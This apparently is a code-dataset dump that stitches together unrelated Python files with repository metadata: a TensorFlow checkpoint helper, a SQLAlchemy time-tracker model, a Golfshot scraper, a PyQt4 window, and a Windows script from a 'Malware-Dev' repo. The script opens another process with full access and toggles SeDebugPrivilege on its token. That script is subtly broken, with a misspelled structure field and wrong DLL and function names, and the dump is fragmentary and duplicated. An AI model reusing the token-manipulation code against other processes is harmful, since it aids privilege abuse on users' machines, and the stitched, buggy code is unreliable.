    Artifacts live under models/<model_name>/<net_name>/: one sub-directory
    per training step, a `tensorboard` directory, and an optional `close`
    marker file used to request a graceful shutdown from outside.
    """
    def __init__(self, sess, model_name, net_name, max_to_keep=500):
        """
        Args:
            sess: live tf.Session used for all save/restore operations.
            model_name: name of the model directory.
            net_name: name of the network sub-directory.
            max_to_keep: how many recent checkpoints the Saver retains
                (0 or None keeps all of them).
        """
        self.sess = sess
        self.model_name = model_name
        self.net_name = net_name
        # Bug fix: `max_to_keep` was accepted but ignored -- the Saver was
        # hard-coded to max_to_keep=0 (keep every checkpoint forever).
        self.saver = tf.train.Saver(max_to_keep=max_to_keep)
    def relative_model_dir_path(self, *paths):
        """Join *paths under this model/network's storage directory."""
        return relative_project_path('models', self.model_name, self.net_name, *paths)
    def load_model(self, step):
        """Restore the checkpoint saved at `step`; raise if it is missing."""
        if not os.path.isfile(self.relative_model_dir_path(str(step), 'model.meta')):
            raise Exception('model is not exist')
        self.saver.restore(self.sess, self.relative_model_dir_path(str(step), 'model'))
        print('restore model succeed, path:', self.relative_model_dir_path(str(step), 'model'))
    def init_model(self):
        """Initialize all graph variables from scratch."""
        tf.global_variables_initializer().run()
        print('init model succeed')
    def load_or_init_model(self, step):
        """Restore the checkpoint at `step` if present, else initialize."""
        if os.path.isfile(self.relative_model_dir_path(str(step), 'model.meta')):
            self.saver.restore(self.sess, self.relative_model_dir_path(str(step), 'model'))
            print('restore model succeed, path:', self.relative_model_dir_path(str(step), 'model'))
        else:
            tf.global_variables_initializer().run()
            print('init model succeed')
    def save_model(self, save_cur_step, save_0_step):
        """Save a checkpoint under the current train_step's directory and/or
        under the special step-0 directory (the "latest" slot)."""
        # read the current step from the graph's train_step variable
        with tf.variable_scope(self.model_name, reuse=True):
            step = tf.get_variable('train_step', shape=(), dtype=tf.int32).eval()
        if save_cur_step:
            os.makedirs(self.relative_model_dir_path(str(step)), exist_ok=True)
            self.saver.save(self.sess, self.relative_model_dir_path(str(step), 'model'))
            print('save model succeed, step:', step)
        if save_0_step:
            step = 0
            os.makedirs(self.relative_model_dir_path(str(step)), exist_ok=True)
            self.saver.save(self.sess, self.relative_model_dir_path(str(step), 'model'))
            print('save model succeed, step:', step)
    def create_tensorboard_write(self):
        """Create and return a summary FileWriter for this network's graph."""
        tensorboard_path = self.relative_model_dir_path('tensorboard')
        os.makedirs(tensorboard_path, exist_ok=True)
        return tf.summary.FileWriter(tensorboard_path, self.sess.graph)
    def check_close_file(self):
        """Return True if an external `close` marker file exists."""
        return os.path.isfile(self.relative_model_dir_path('close'))
    def remove_close_file(self):
        """Delete the `close` marker if present; return whether it existed."""
        if os.path.isfile(self.relative_model_dir_path('close')):
            os.remove(self.relative_model_dir_path('close'))
            return True
        return False
| 2,250 | -7 | 265 |
72bc8a1878b0d62c89218738d3dca18323b62324 | 5,997 | py | Python | otter/database/model.py | pathob/odoo-otter | 1bf5dbab3c3ef12a12cae604d82d4e6f855f37fc | [
"Apache-2.0"
] | null | null | null | otter/database/model.py | pathob/odoo-otter | 1bf5dbab3c3ef12a12cae604d82d4e6f855f37fc | [
"Apache-2.0"
] | 1 | 2022-01-10T15:05:53.000Z | 2022-01-10T15:05:53.000Z | otter/database/model.py | pathob/odoo-otter | 1bf5dbab3c3ef12a12cae604d82d4e6f855f37fc | [
"Apache-2.0"
] | null | null | null | # based on https://realpython.com/python-sqlite-sqlalchemy/#using-flat-files-for-data-storage
from datetime import datetime
import sqlalchemy
from sqlalchemy import Column, String, Boolean, Integer, Float, Date, DateTime, ForeignKey, select, func, cast
from sqlalchemy.exc import NoResultFound
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship, backref, object_session
from otter.database import engine
# from otter.database import session as sess
from otter.util.cli import project_task_abbrev
from otter.util.date import datetime_to_time_string, date_string_to_date
Base = declarative_base()
# cached Odoo objects
# class BaseMixin(Base):
# @classmethod
# def create(cls, **kw):
# obj = cls(**kw)
# # TODO: That's so ugly
# session = sess()
# session.add(obj)
# session.commit()
# Otter objects
Base.metadata.create_all(engine())
| 30.135678 | 113 | 0.629148 | # based on https://realpython.com/python-sqlite-sqlalchemy/#using-flat-files-for-data-storage
from datetime import datetime
import sqlalchemy
from sqlalchemy import Column, String, Boolean, Integer, Float, Date, DateTime, ForeignKey, select, func, cast
from sqlalchemy.exc import NoResultFound
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship, backref, object_session
from otter.database import engine
# from otter.database import session as sess
from otter.util.cli import project_task_abbrev
from otter.util.date import datetime_to_time_string, date_string_to_date
Base = declarative_base()
# cached Odoo objects
# class BaseMixin(Base):
# @classmethod
# def create(cls, **kw):
# obj = cls(**kw)
# # TODO: That's so ugly
# session = sess()
# session.add(obj)
# session.commit()
class Project(Base):
    """Local cache of an Odoo project; primary key is Odoo's own id."""
    __tablename__ = "project"
    odoo_id = Column(Integer, primary_key=True, autoincrement=False)
    name = Column(String)
    active = Column(Boolean)
    project_tasks = relationship("ProjectTask", backref=backref("project"))
    @classmethod
    def from_odoo_json(cls, json):
        """Build a Project from the dict the Odoo JSON API returns."""
        return cls(
            odoo_id=json['id'],
            name=json['name'],
            active=json['active']
        )
class ProjectTask(Base):
    """Local cache of an Odoo project task, linked to its Project."""
    __tablename__ = "project_task"
    odoo_id = Column(Integer, primary_key=True, autoincrement=False)
    name = Column(String)
    active = Column(Boolean)
    project_id = Column(Integer, ForeignKey("project.odoo_id"))
    records = relationship("Record", backref=backref("project_task"))
    @classmethod
    def from_odoo_json(cls, json):
        """Build a ProjectTask from the Odoo JSON API dict; Odoo encodes
        the project reference as an [id, display_name] pair."""
        return cls(
            odoo_id=json['id'],
            name=json['name'],
            active=json['active'],
            project_id=json['project_id'][0]
        )
class Record(Base):
    """A time-tracking record for one task on one day.

    A record either has a fixed `unit_amount` (hours, e.g. synced from Odoo)
    or derives its duration from its RecordTimeSlice children; its
    description is either `name` or the joined RecordTrackItem names.
    """
    __tablename__ = "record"
    id = Column(Integer, primary_key=True, autoincrement=True)
    odoo_id = Column(Integer, unique=True)  # null until synced to Odoo
    date = Column(Date, nullable=False)
    name = Column(String)
    unit_amount = Column(Float)
    project_task_id = Column(Integer, ForeignKey("project_task.odoo_id"))
    record_track_items = relationship("RecordTrackItem", backref=backref("record"),
                                      cascade="all, delete, delete-orphan")
    record_time_slices = relationship("RecordTimeSlice", backref=backref("record"),
                                      cascade="all, delete, delete-orphan")
    def __repr__(self):
        # e.g. "[01:30] PRJ/Task\n        description..."
        hh_mm = f"[{self.duration_str}]"
        return (
            f"{hh_mm} {self.project_task_abbrev(len(hh_mm)+1)}\n" +
            f"  {self.description}"
        )
    @classmethod
    def get_id_by_odoo_id(cls, odoo_id, session):
        """Return the local id for a given Odoo id, or None if unknown."""
        try:
            record_id, = session.query(Record.id).filter_by(odoo_id=odoo_id).one()
            return record_id
        except NoResultFound:
            return None
    @classmethod
    def from_odoo_json(cls, local_id, json):
        """Build a Record from an Odoo timesheet-line dict, reusing a known
        local id (or None to autoincrement)."""
        return cls(
            id=local_id,
            odoo_id=json['id'],
            date=date_string_to_date(json['date']),
            name=json['name'],
            unit_amount=json['unit_amount'],
            project_task_id=json['task_id'][0]
        )
    @property
    def duration(self):
        """Duration in hours: `unit_amount` if set, else the summed length
        of all time slices (open slices count up to now), else 0."""
        if self.unit_amount is not None:
            return self.unit_amount
        duration = (
            object_session(self)
            .scalar(
                select(func.sum((
                    # julianday difference is in days; * 24 converts to hours
                    cast(func.coalesce(func.julianday(RecordTimeSlice.time_stop), func.julianday(datetime.now()))
                         - func.julianday(RecordTimeSlice.time_start), sqlalchemy.Float) * 24
                )))
                .where(RecordTimeSlice.record_id == self.id)
            )
        )
        if duration is not None:
            return duration
        return 0
    @property
    def duration_str(self):
        """Duration formatted as HH:MM (rounded to the nearest minute)."""
        if self.duration is not None:
            h, m = divmod(round(self.duration * 60), 60)
            return f"{h:02d}:{m:02d}"
        return None
    @property
    def description(self):
        """The record's name, or the comma-joined names of its track items."""
        if self.name is not None:
            return self.name
        return (
            object_session(self)
            .scalar(
                select(func.group_concat(RecordTrackItem.name, ', '))
                .where(RecordTrackItem.record_id == self.id)
            )
        )
    @property
    def project_id(self):
        return self.project_task.project_id
    @property
    def project_name(self):
        return self.project_task.project.name
    @property
    def project_task_name(self):
        return self.project_task.name
    def project_task_abbrev(self, offset_length=0):
        """Abbreviated "project/task" label, indent-aware via offset_length."""
        return project_task_abbrev(self.project_name, self.project_task_name, offset_length)
    def odoo_create_json(self):
        """Payload for creating this record through the Odoo API."""
        return {
            'date': self.date,
            'project_id': self.project_id,
            'task_id': self.project_task_id,
            'duration': self.unit_amount,
            'names': self.name
        }
# Otter objects
class RecordTrackItem(Base):
    """A short note attached to a Record; items are joined to form the
    record's description when it has no explicit name."""
    __tablename__ = "record_track_item"
    id = Column(Integer, primary_key=True, autoincrement=True)
    name = Column(String, nullable=False)
    record_id = Column(Integer, ForeignKey("record.id"), nullable=False)
class RecordTimeSlice(Base):
    """One start/stop interval of work on a Record."""
    __tablename__ = "record_time_slice"
    id = Column(Integer, primary_key=True, autoincrement=True)
    # the start time may never be null while the stop time is null until it the work got stopped
    time_start = Column(DateTime, nullable=False)
    time_stop = Column(DateTime, nullable=True)
    record_id = Column(Integer, ForeignKey("record.id"), nullable=False)
    @property
    def time_start_str(self):
        """Start time formatted for display."""
        return datetime_to_time_string(self.time_start)
    @property
    def time_stop_str(self):
        """Stop time formatted for display (slice may still be open)."""
        return datetime_to_time_string(self.time_stop)
Base.metadata.create_all(engine())
| 2,597 | 2,343 | 115 |
f17683f3d27673d7aef5f527130d3c6b329fd12a | 3,553 | py | Python | golfshot-downloader.py | tinman6/golfshot-downloader | c5093c670a673fc0ee26fd0dceb9bba0c7675ad2 | [
"MIT"
] | null | null | null | golfshot-downloader.py | tinman6/golfshot-downloader | c5093c670a673fc0ee26fd0dceb9bba0c7675ad2 | [
"MIT"
] | null | null | null | golfshot-downloader.py | tinman6/golfshot-downloader | c5093c670a673fc0ee26fd0dceb9bba0c7675ad2 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import argparse
from bs4 import BeautifulSoup
from html.parser import HTMLParser
from lxml import etree
import json
import re
import requests
GOLFSHOT_URL = 'https://play.golfshot.com'
parser = argparse.ArgumentParser(description='Download GolfShot data')
parser.add_argument('username', help='Username for GolfShot account')
parser.add_argument('password', help='Password for GolfShot account')
parser.add_argument('profile_id', help='Profile ID for GolfShot account')
parser.add_argument('--until', help='Download rounds until specified round (by descending date)')
args = parser.parse_args()
with requests.Session() as session:
tokenRequest = session.get(f'{GOLFSHOT_URL}/signin')
parser = etree.HTMLParser()
tree = etree.fromstring(tokenRequest.text, parser)
verificationToken = tree.xpath('//form//input[@name="__RequestVerificationToken"]/@value')[0]
signin = session.post(f'{GOLFSHOT_URL}/signin',
data={'Email': args.username,
'Password': args.password,
'__RequestVerificationToken': verificationToken,
})
download_rounds(session, args.profile_id, args.until)
| 33.838095 | 160 | 0.687025 | #!/usr/bin/python
import argparse
from bs4 import BeautifulSoup
from html.parser import HTMLParser
from lxml import etree
import json
import re
import requests
GOLFSHOT_URL = 'https://play.golfshot.com'
class RoundParser(HTMLParser):
    """Extracts the Golfshot Scorecard model that round pages embed in an
    inline <script>; the parsed JSON dict lands in ``self.results``."""
    _MODEL_RE = re.compile(
        r"(?<=ReactDOM.hydrate\(React.createElement\(Golfshot.Applications.Scorecard, )"
        r"(.*)"
        r"(?=\), document.getElementById)"
    )
    def handle_data(self, data):
        # the model is available in a script block on the round page
        if 'Golfshot.Applications.Scorecard' not in data:
            return
        self.results = json.loads(self._MODEL_RE.search(data).group())
class CourseParser(HTMLParser):
    """Extracts the CourseScorecard model embedded in a course page's inline
    <script>; the parsed JSON dict lands in ``self.results``."""
    _MODEL_RE = re.compile(
        r'(?<=ReactDOM.hydrate\(React.createElement\(Golfshot.Applications.CourseScorecard, )'
        r'(.*)'
        r'(?=\), document.getElementById)'
    )
    def handle_data(self, data):
        if 'Golfshot.Applications.CourseScorecard' not in data:
            return
        self.results = json.loads(self._MODEL_RE.search(data).group())
def download_course(session, course_id):
    """Fetch a course page, extract its scorecard JSON, and write it to
    data/courses/<course_id>.json (directory must already exist)."""
    COURSE_URL = f'{GOLFSHOT_URL}/courses/{course_id}'
    res = session.get(COURSE_URL)
    p = CourseParser()
    p.feed(res.text)
    # the scorecard source URL's second-to-last path segment is the UUID
    course_uuid = p.results['source'].split('/')[-2]
    scorecard = session.get(p.results['source']).json()['scorecard'] # remove unused siblings
    with open('data/courses/%s.json' % course_id, 'w') as f:
        ret = {'courseId': course_id,
               'courseUuid': course_uuid,
               'scorecard': scorecard}
        json.dump(ret, f)
def download_round(session, profile_id, round_id):
    """Fetch one round's scorecard model, save it under data/rounds/, and
    also download the course it was played on."""
    ROUND_URL = f'{GOLFSHOT_URL}/profiles/{profile_id}/rounds/{round_id}'
    res = session.get(ROUND_URL)
    p = RoundParser()
    p.feed(res.text)
    with open('data/rounds/%s.json' % p.results['roundGroupId'], 'w') as f:
        json.dump(p.results, f)
    download_course(session, p.results['model']['detail']['golfCourseWebId'])
def download_rounds(session, profile_id, last_round=None):
    """Page through a profile's round list (newest first), downloading each.

    Stops when the listing runs out of pages, or — exclusively — when
    `last_round` is reached, so previously downloaded rounds are skipped.
    """
    ROUNDS_URL = f'{GOLFSHOT_URL}/profiles/{profile_id}/rounds'
    params = {'sb': 'Date', 'sd': 'Descending', 'p': 1}
    while True:
        # BUG FIX: the sort/pagination options must travel as query-string
        # parameters (params=), not as a GET request body (data=); with
        # data= the 'p' page number never reached the server, so every
        # iteration re-fetched page 1.
        rounds_html = session.get(ROUNDS_URL, params=params).text
        soup = BeautifulSoup(rounds_html, 'html.parser')
        round_table = soup.find('table', {'class': 'search-results'})
        if not round_table:
            # No results table means we paged past the last round.
            return
        for row in round_table.tbody.findAll('tr'):
            # Each row carries a data-href of /profiles/<id>/rounds/<round_id>.
            round_id = row.attrs['data-href'].split('/')[-1]
            if round_id == last_round:
                return
            print('Downloading %s...' % round_id)
            download_round(session, profile_id, round_id)
        params['p'] += 1
# Command-line interface: GolfShot credentials plus the profile whose rounds
# should be downloaded; --until stops at an already-downloaded round.
parser = argparse.ArgumentParser(description='Download GolfShot data')
parser.add_argument('username', help='Username for GolfShot account')
parser.add_argument('password', help='Password for GolfShot account')
parser.add_argument('profile_id', help='Profile ID for GolfShot account')
parser.add_argument('--until', help='Download rounds until specified round (by descending date)')
args = parser.parse_args()
with requests.Session() as session:
    # The sign-in form is CSRF-protected: fetch the page first and pull the
    # anti-forgery token out of the form before posting credentials.
    tokenRequest = session.get(f'{GOLFSHOT_URL}/signin')
    # NOTE(review): rebinds the name `parser` (previously the argparse
    # parser) to an lxml HTMLParser; harmless here but easy to misread.
    parser = etree.HTMLParser()
    tree = etree.fromstring(tokenRequest.text, parser)
    verificationToken = tree.xpath('//form//input[@name="__RequestVerificationToken"]/@value')[0]
    signin = session.post(f'{GOLFSHOT_URL}/signin',
                          data={'Email': args.username,
                                'Password': args.password,
                                '__RequestVerificationToken': verificationToken,
                                })
    download_rounds(session, args.profile_id, args.until)
| 2,151 | 19 | 163 |
195f9f62c5e9e58bb63a7defda4ff1c86c175351 | 1,719 | py | Python | examples/pyqtcom/mainwindow_UI.py | chinnurtb/distrex | a97a086050af6c799c86dadd3d2eb5c4ecb9b21c | [
"BSD-4-Clause"
] | 1 | 2015-01-12T01:19:13.000Z | 2015-01-12T01:19:13.000Z | examples/pyqtcom/mainwindow_UI.py | chinnurtb/distrex | a97a086050af6c799c86dadd3d2eb5c4ecb9b21c | [
"BSD-4-Clause"
] | null | null | null | examples/pyqtcom/mainwindow_UI.py | chinnurtb/distrex | a97a086050af6c799c86dadd3d2eb5c4ecb9b21c | [
"BSD-4-Clause"
] | null | null | null | from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
| 47.75 | 139 | 0.706225 | from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_MainWindow(object):
    """Designer-style UI builder for the Distrex PyQt tester window.

    Creates a 3-column table plus Lock/Unlock buttons laid out in a grid,
    and wires the buttons to MainWindow.lock / MainWindow.unlock.
    """
    def setupUi(self, MainWindow):
        """Build all widgets onto MainWindow (PyQt4, old-style signals)."""
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(800, 756)
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
        self.gridLayout = QtGui.QGridLayout(self.centralwidget)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        # Empty 3-column table; rows are presumably filled in elsewhere at
        # runtime — TODO confirm against the window class.
        self.tableWidget = QtGui.QTableWidget(self.centralwidget)
        self.tableWidget.setColumnCount(3)
        self.tableWidget.setObjectName(_fromUtf8("tableWidget"))
        self.tableWidget.setRowCount(0)
        self.LockButton = QtGui.QPushButton(self.centralwidget)
        self.LockButton.setText("Lock")
        self.UnlockButton = QtGui.QPushButton(self.centralwidget)
        self.UnlockButton.setText("Unlock")
        # Grid placement: table spans the top row, buttons sit below it.
        self.gridLayout.addWidget(self.tableWidget, 0, 0, 1, 1)
        self.gridLayout.addWidget(self.LockButton, 2, 2, 2, 2)
        self.gridLayout.addWidget(self.UnlockButton, 2, 1, 1, 1)
        MainWindow.setCentralWidget(self.centralwidget)
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
        # Old-style PyQt4 signal/slot connections to methods the hosting
        # window must provide.
        QtCore.QObject.connect(self.LockButton, QtCore.SIGNAL("clicked()"), MainWindow.lock)
        QtCore.QObject.connect(self.UnlockButton, QtCore.SIGNAL("clicked()"), MainWindow.unlock)
    def retranslateUi(self, MainWindow):
        """Apply translatable strings (only the window title here)."""
        MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "Distrex PyQt tester", None, QtGui.QApplication.UnicodeUTF8))
| 1,496 | 7 | 81 |
4b805d7ef26b22a989836bce1b521bf8bf18807d | 5,618 | py | Python | src/os-specific/windows/token/modify_token.py | shownadda/Malware-Dev | a3fb40371bb4c4f41c582747af41ae8800050f5c | [
"Unlicense"
] | 46 | 2022-01-30T14:29:02.000Z | 2022-03-25T03:49:13.000Z | src/os-specific/windows/token/modify_token.py | shownadda/Malware-Dev | a3fb40371bb4c4f41c582747af41ae8800050f5c | [
"Unlicense"
] | null | null | null | src/os-specific/windows/token/modify_token.py | shownadda/Malware-Dev | a3fb40371bb4c4f41c582747af41ae8800050f5c | [
"Unlicense"
] | 1 | 2022-03-05T03:42:55.000Z | 2022-03-05T03:42:55.000Z | ## Modify Process Token
# Global Imports
import ctypes
from ctypes.wintypes import DWORD
# Grab a handle on Advapi.dll, User32.dll and Kernel32.dll
a_handle = ctypes.WinDLL("Advapi32.dll")
u_handle = ctypes.WinDLL("User32.dll")
k_handle = ctypes.WinDLL("Kernel32.dll")
# Shortcut to give "All Access" rights to the current process.
# The |'s are being used as "or" statements, as a shortcut instead of typing out every variable needed, and their values.
PROCESS_ALL_ACCESS = ( 0x000f0000 | 0x00100000 | 0xFFF)
# Also used in C# Libraries
# 2 is enabled, 0 is disabled
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000 #
STANDARD_RIGHTS_READ = 0x00020000 #
TOKEN_ASSIGN_PRIMARY = 0x0001 #
TOKEN_DUPLICATE = 0x0002 #
TOKEN_IMPERSONATION = 0x0004 #
TOKEN_QUERY = 0x0008 #
TOKEN_QUERY_SOURCE = 0x0010 #
TOKEN_ADJUST_PRIVILEGES = 0x0020 #
TOKEN_ADJUST_GROUPS = 0x0040 #
TOKEN_ADJUST_DEFAULT = 0x0080 #
TOKEN_ADJUST_SESSIONID = 0x0100 #
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY) #
TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# Grab the Window Name from User32.dll
lpWindowName = ctypes.c_char_p(input("Enter Window name to hook into: ").encode('utf-8'))
hWnd = u_handle.FindWindowA(None, lpWindowName)
if hWnd == 0:
print("Error Code: {0} - Could not grab Process Handle! Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("Successfuly got Handle.")
lpdwProcessId = ctypes.c_ulong()
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
if response == 0:
print("Error Code: {0} - Could not grab PID from Handle! Error Code: {0}".format(k_handle.GetlastError))
exit(1)
else:
print("Successfuly got PID!")
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = lpdwProcessId
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
if hProcess <= 0:
print("Error Code {0} - Could not grab Priv Handle".format(k_handle.GetLastError()))
else:
print("Successfully grabbed higher privileges!")
# Open a Handle to the Process's Token Directly
ProcessHandle = hProcess
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
if response > 0:
print("Handle to Process Token created! Token: {0}".format(TokenHandle))
else:
print("Error: could not grab priviledged Token Handle! Error Code: {0}".format(k_handle.GetLastError()))
lpSystemName = None
lpName = "SEDebugPrivilege"
lpLuid = LUID()
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(lpLuid))
if response > 0:
print("Successfully found the LUID!")
else:
print("Error: could not grab LUID! Error Code: {0}".format(k_handle.GetLastError()))
print("LUID VALUE HIGH: {0} \nLUID VALUE LOW: {1}".format(lpLuid.HighPart, lpLuid.LowPart))
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES()
requiredPrivileges.Privileges.Luid = lpLuid
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
if response > 0:
print("Successfully ran Privilege check!")
else:
print("Error: Was unable to check Privileges! Error Code: {0}".format(k_handle.GetLastError()))
if pfResult:
print("Privilege Enabled: {0}".format(lpName))
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_DISABLED
else:
print("Privileges Disabled: {0}".format(lpName))
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength =ctypes.c_void_p()
NewState.PrivilegeCount = 1
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
if response > 0:
print("Token was successfully modified!")
else:
print("Error: Was unable to check Privileges! Error Code: {0}".format(k_handle.GetLastError()))
| 33.242604 | 122 | 0.681737 | ## Modify Process Token
# Global Imports
import ctypes
from ctypes.wintypes import DWORD
# Grab a handle on Advapi.dll, User32.dll and Kernel32.dll
a_handle = ctypes.WinDLL("Advapi32.dll")
u_handle = ctypes.WinDLL("User32.dll")
k_handle = ctypes.WinDLL("Kernel32.dll")
# Shortcut to give "All Access" rights to the current process.
# The |'s are being used as "or" statements, as a shortcut instead of typing out every variable needed, and their values.
PROCESS_ALL_ACCESS = ( 0x000f0000 | 0x00100000 | 0xFFF)
# Also used in C# Libraries
# 2 is enabled, 0 is disabled
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000 #
STANDARD_RIGHTS_READ = 0x00020000 #
TOKEN_ASSIGN_PRIMARY = 0x0001 #
TOKEN_DUPLICATE = 0x0002 #
TOKEN_IMPERSONATION = 0x0004 #
TOKEN_QUERY = 0x0008 #
TOKEN_QUERY_SOURCE = 0x0010 #
TOKEN_ADJUST_PRIVILEGES = 0x0020 #
TOKEN_ADJUST_GROUPS = 0x0040 #
TOKEN_ADJUST_DEFAULT = 0x0080 #
TOKEN_ADJUST_SESSIONID = 0x0100 #
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY) #
TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attritbutes", DWORD),
]
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Grab the Window Name from User32.dll
lpWindowName = ctypes.c_char_p(input("Enter Window name to hook into: ").encode('utf-8'))
hWnd = u_handle.FindWindowA(None, lpWindowName)
if hWnd == 0:
print("Error Code: {0} - Could not grab Process Handle! Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("Successfuly got Handle.")
lpdwProcessId = ctypes.c_ulong()
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
if response == 0:
print("Error Code: {0} - Could not grab PID from Handle! Error Code: {0}".format(k_handle.GetlastError))
exit(1)
else:
print("Successfuly got PID!")
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = lpdwProcessId
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
if hProcess <= 0:
print("Error Code {0} - Could not grab Priv Handle".format(k_handle.GetLastError()))
else:
print("Successfully grabbed higher privileges!")
# Open a Handle to the Process's Token Directly
ProcessHandle = hProcess
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
if response > 0:
print("Handle to Process Token created! Token: {0}".format(TokenHandle))
else:
print("Error: could not grab priviledged Token Handle! Error Code: {0}".format(k_handle.GetLastError()))
lpSystemName = None
lpName = "SEDebugPrivilege"
lpLuid = LUID()
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(lpLuid))
if response > 0:
print("Successfully found the LUID!")
else:
print("Error: could not grab LUID! Error Code: {0}".format(k_handle.GetLastError()))
print("LUID VALUE HIGH: {0} \nLUID VALUE LOW: {1}".format(lpLuid.HighPart, lpLuid.LowPart))
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES()
requiredPrivileges.Privileges.Luid = lpLuid
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
if response > 0:
print("Successfully ran Privilege check!")
else:
print("Error: Was unable to check Privileges! Error Code: {0}".format(k_handle.GetLastError()))
if pfResult:
print("Privilege Enabled: {0}".format(lpName))
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_DISABLED
else:
print("Privileges Disabled: {0}".format(lpName))
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# Build the TOKEN_PRIVILEGES NewState with the single privilege whose
# Attributes flag was chosen above (toggle of its current state).
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength =ctypes.c_void_p()
NewState.PrivilegeCount = 1
NewState.Privileges = requiredPrivileges.Privileges
# Apply the new privilege attributes to the token; PreviousState /
# ReturnLength receive the prior state for a potential rollback.
response = a_handle.AdjustTokenPrivileges(
    TokenHandle,
    DisableAllPrivileges,
    ctypes.byref(NewState),
    BufferLength,
    ctypes.byref(PreviousState),
    ctypes.byref(ReturnLength))
if response > 0:
    print("Token was successfully modified!")
else:
    # NOTE(review): the message says "check Privileges" but this branch is
    # the adjust call failing; the string is runtime output so left as-is.
    print("Error: Was unable to check Privileges! Error Code: {0}".format(k_handle.GetLastError()))
| 0 | 478 | 100 |
3a7284fda4bbc14d07099918c87da08e457cc884 | 277 | py | Python | doodledashboard/filters/filter.py | fossabot/Doodle-Dashboard | 147f5074afd594c47553a115358783b3f91043f0 | [
"MIT"
] | null | null | null | doodledashboard/filters/filter.py | fossabot/Doodle-Dashboard | 147f5074afd594c47553a115358783b3f91043f0 | [
"MIT"
